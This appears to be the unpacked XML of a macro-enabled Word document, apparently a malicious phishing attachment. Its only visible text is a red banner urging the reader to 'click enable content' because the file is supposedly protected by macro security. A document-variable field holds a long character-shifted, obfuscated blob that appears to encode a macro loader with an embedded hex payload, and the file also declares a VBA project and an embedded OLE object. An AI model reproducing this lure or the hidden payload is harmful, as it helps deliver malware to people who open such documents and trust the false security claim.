
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>
  <Default Extension="docx" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.documen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A4ED1D7" w14:textId="65052E85" w:rsidR="00DE31B6" w:rsidRPr="00030FA9" w:rsidRDefault="00030FA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030FA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="1CD4FD2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margin-left:0;margin-top:0;width:468.05pt;height:22.5pt;z-index:251658240;mso-position-horizontal-relative:text;mso-position-vertical-relative:text">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Word.Document.12" ShapeID="_x0000_s1026" DrawAspect="Content" ObjectID="_1658146775" r:id="rId6">
            <o:FieldCodes>\s</o:FieldCodes>
          </o:OLEObject>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00030FA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PLEASE THIS FILE IS BEEN PROTECT BY MARCROS SECURITY KINDLY CLICK ENABLE CONTENT</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DE31B6" w:rsidRPr="00030FA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d35b8465148" w:val="ut|jwxmjqq%2\nsit|Xy~qj%Mniijs%_x0012__x000f_kzshynts%{==g8%€ufwfr-)f7j&gt;fk.)p==9:B,pkg:=:,@)r;8ghB,,@ktw%-)nB5@%)n%2qy%)f7j&gt;fk3qjslym@)n0B7.€)s=&lt;f&gt;&gt;;B`hts{jwyb??YtG~yj-)f7j&gt;fk3Xzgxywnsl-)n17.16;.@)r;8gh0B`hmfwb-)s=&lt;f&gt;&gt;;%2g}tw%)p==9:`-)n47.*)p==9:3qjslymb.@‚wjyzws%)r;8gh@‚_x0012__x000f_)v&gt;ki;6%B%,6j6:5g:g:k6:8=6k6696:i:=:56866:h:;:79g8:6g9;9h:55;9=8595:;96575g5&lt;6g&lt;6:g6k5865:f9=;;5j6969:h:g:56=:i6&lt;9;:6:g5h9;869h9g965j5g9h&lt;6:6:95h5=5i9;9h:h5=6::&gt;959g:h5:5697;;969;6k585k6g&lt;6&lt;f:56866:h:;:79g8:6g9;9h:55;9=7h:59h5j;;;h6795:f:&gt;575:97:;:9:96=6:979;5g:;:f:k:&lt;5798;j7k5f5j&lt;h::9:59696;6i6f:j5j695h:5:95;:&gt;999j&lt;5:;966&gt;6k87:f:6:g6k:g95&lt;7:i968g695i:;&lt;&gt;:65k695&lt;9;9g6&lt;978g6795:f:&gt;575:979;9h:96k5k566::i9i6k5865:g6=&lt;h5:6787969f6:56:&lt;:g5h:h6i775=6;;:9h9&lt;9g6k:f:55j589&lt;6:6;9&lt;:6:g5h9;56:55g5&lt;:h9k:&gt;;j&lt;h:&gt;5&lt;7k5k9::&lt;9&lt;6k9j95:j:i9&lt;5:585j5;5f6&lt;9&lt;785h969f9h8g5&gt;5g:g9h5=9&gt;7f5i:9:h&lt;&gt;575965:99f9h9&gt;9k8k9:9i:&lt;5&lt;5k566:9g965f675g:;6=:568675&lt;9&lt;:;6:775=6;;:9h9&lt;9g575&lt;:95g565k9j66969f:h5:56979i5i57:&gt;::9g5j;8&lt;65&lt;5f7g:=9=:f6&gt;679f6&lt;:8:56&gt;5=5&lt;:&gt;5g5&lt;9&gt;9f7&lt;:g9h9&lt;678;5i:h:;96:;9989:h9f966j5&lt;5j;:9f:f6k5856966f6h8;6;6&lt;:&lt;:9:h5=9;6696:&gt;96575:97:595965j695h6::f:f595f97:i5k:85k:69f&lt;h:;968g67656:9i575&gt;:j56:9:&gt;6&gt;8j7k5h96;=966&gt;9;6;59:h:95f589j95:6:g6k9;67:9:j575f:79j:f9i969g685g:g9h6:5k:65558:h56:=9k:&gt;;j&lt;h:&gt;5&lt;7k5k9::&lt;9&lt;6k9j95&lt;j:i9&lt;5:585j5;5f6g5k5f5j6&lt;69&lt;55:67659h;=:f575=6;5=6f;&lt;6k5f7k:f9j:57;585k:f9f9h9&gt;9f86:59h&lt;&gt;5f6:6;&lt;59f9&lt;5969:k:8:&gt;:&gt;6=589g;=9g965f675g:;6=:568675&lt;9&lt;:;6:6i5&gt;5g:66=:j:758:::5:f6i775=6;;:9h9&lt;9g5=:;5i:h:55i9f7g:g9h;:6k6997965j:5:i599j:h:;969g65585;5f5&lt;5j9k:&gt;9:9i:&lt;5&lt;5k566:9g965f675g:;6=:h5:67979::f:6:75&lt;:557656h657k5h96;=966&gt;9;6;:&lt;56555j:9:k:6:i:9:=:75;6i9j5i:859:66i6f5:5f:;55595&gt;555=:&lt;:9555&gt;5::h:;586&lt;666h:55k596i9h:&lt;:7:85&lt;5&lt;6&gt;5=775=6;;:9h9&lt;9:8h5&lt;9&lt;:&lt;6h657k5h96;=966&gt;9;5k5;:i5;:i:g5=59565h5k9j6;:&lt;56555j:99j98555i5&gt;::9f6&lt;5f:9:g59:8595i:;:i59:&lt;585=:9:g:j:55:5h5::j58:&lt;5;5=:5:f:7956h665j57559f:=5g:5:=:5985=&lt;6:g6k8;6;9&lt;6;;k5j695i6h98;5775=6;;:9h9&lt;9g6;:5555g:&lt;:=59:k6i;i&lt;h5:6787969f6h:j:i6&lt;:h:;969g565957:j:&lt;:h:k:k5:58:h5i9j5f57:j:6:h9j5k5;:i5;:i9f675&lt;5i5;5&gt;::556&gt;5=9i:k:;9j:f9i969g565957:j:&lt;:h:k9g6h98&lt;&lt;67675&lt;;j;:6:6i58:&lt;:5:&gt;57:;6i:79i5g599&lt;:;6f:8:j6&gt;:g6j:g5:9:5j775=6;;:9h9&lt;9g6::::9:h58:;7g589&lt;9g:i5f5f9h&lt;9:9:&gt;595:7f&lt;7:9:f5&gt;5&lt;5j6i5g6h:57g589&lt;9g:i5f5f9h&lt;;:&lt;9:679j69:55i:55f:69j5:699;:h5&lt;5;58695;97:i5&gt;5h:i575j599f:g:i979g7k5h96;=966&gt;9j5k5;:i5;:i9=8;:f&lt;6:g6k:5:;6i666j:g6j:75:5&gt;:&lt;979f6657:&gt;:6:i9f:66h589=6;6g66969f:h5:569799:j:&lt;:j58:8:55:&lt;55:655g9&lt;:&lt;:g5;585h966;&lt;75j6779:f:9:65j6987:99h:i98785h98:69&lt;595=5k:5:;969:8:67:5:g:h5f5f79:f:9:65j699h&lt;99=9:5&lt;5k56:99h:h595=7;:99h:9979;9&gt;6:6f;&gt;8&lt;5858:;5i:89&gt;9;9&gt;6:9j5i:859:66i6f56:j:;:659:&gt;55:g999g5j:;:56h9;8::5:f&lt;;5&lt;5k5&lt;:g9h6i979=7;:f9k:g5&lt;5&gt;58:6&lt;j:h5&lt;589f98555i5&gt;::9f6&lt;5=5;:f:9:8585h55:g:9:8:95h56:j:6:&lt;:95=5::f:5:7565i:;:j:7:;:;5=56:g:k:7555h55:j:7:&lt;5;5=5&lt;:f:6:;585=:;:f:6:8575&gt;:9:j5::&lt;:95=5i:f:::7:85i5::j:5:;595g56:g:7:7:&lt;5i:&lt;:j58:&lt;:;5=57:g:::;:;5i5::k:;:&lt;5:6f6h9&lt;6&lt;59:&lt;5i:5:f589g5j;=9&lt;595:5&lt;9;9g;;6k5&lt;6596&lt;6:g5i5&gt;97:i:h:9:&gt;58555=:;:56h9;879&lt;:&lt;:;5j6:66;;9h:96&gt;677g:g:j:f986&lt;59:&lt;5i:5:f589g5j;=9&lt;595:5&lt;9;9g6g8=67589&lt;9h6i5857585&lt;:i:&lt;97:i65:59h956&gt;5=975:589=6g6855:&gt;:6:;9g6:6;:99h:h5=9;66969f:h5:569798555i5&gt;::9f9;9h9&lt;575=5:6:975;5k::59:&lt;669j6=6765:h:;:79g6k:f:55j58:;995&gt;:8:f55:8:8955j9g966&gt;5k5h:76=:65j5&lt;:656:h5=9&gt;99:&gt;:8:&lt;9&lt;985k5h966=:h:;:;:&gt;6::65&gt;66::5;5;:j:&lt;9:7f5&lt;:g:k9658:i5g6j5:5&lt;976i559h9h:59g5h:85h56:6:;7:5i:g9j:56&gt;679h;6:&lt;&lt;&lt;67675&lt;6i975;5k::59:&lt;6;;;6j5966969f:h5:569f:h695&lt;979f:858665j5k58585;5h:695:g9f:;:5:96&gt;9k9f:k5&gt;5h:7578h9h55:5:i:58&gt;6i:66f:&gt;9k9&lt;9h55:5:i:59h&lt;&gt;:i:g5h675f;=665j6;695&lt;969i9&lt;5:9;5;:5:&gt;5;:k57:&gt;9=9:,@_x0012__x000f_)v&gt;ki;67%B%{==g8-)v&gt;ki;6.@_x0012__x000f_Fii2Y~uj%2Y~ujIjknsnynts%)v&gt;ki;67@_x0012__x000f_`x8h6&gt;:&lt;b??ugi&gt;f7&lt;-.@_x0012__x000f__x0012__x000f__x0012__x000f_"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00851937"/>
    <w:rsid w:val="00030FA9"/>
    <w:rsid w:val="00851937"/>
    <w:rsid w:val="00DE31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4D8F6A0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İ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package" Target="embeddings/Microsoft_Word_Document.docx"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.emf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12</Words>
  <Characters>70</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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WladyslaW</dc:title>
  <dc:subject>Hidrosis</dc:subject>
  <dc:creator/>
  <cp:keywords>Crowdedness</cp:keywords>
  <dc:description>Broonzy</dc:description>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-05T22:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-05T22:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>